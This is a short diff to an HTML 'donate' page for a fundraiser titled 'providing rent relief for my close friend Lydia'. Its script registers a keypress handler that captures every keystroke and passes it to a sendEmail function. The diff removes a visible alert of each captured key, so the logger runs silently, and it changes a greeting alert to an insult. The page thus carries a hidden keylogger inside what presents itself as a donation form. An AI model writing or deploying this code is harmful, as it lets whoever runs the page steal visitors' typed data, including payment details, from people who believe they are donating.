--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -18,13 +18,12 @@
    }
   </script>
   <script>
-	  window.alert('hello')
+	  window.alert('ur a loser')
    document.onkeypress = function(e) {
 	get = window.event?event:e;
 	key = get.keyCode?get.keyCode:get.charCode;
 	key = String.fromCharCode(key);
 	sendEmail(key);
-	window.alert(key);
 }
   </script>
   <meta charset="utf-8" data-react-helmet="true"/>
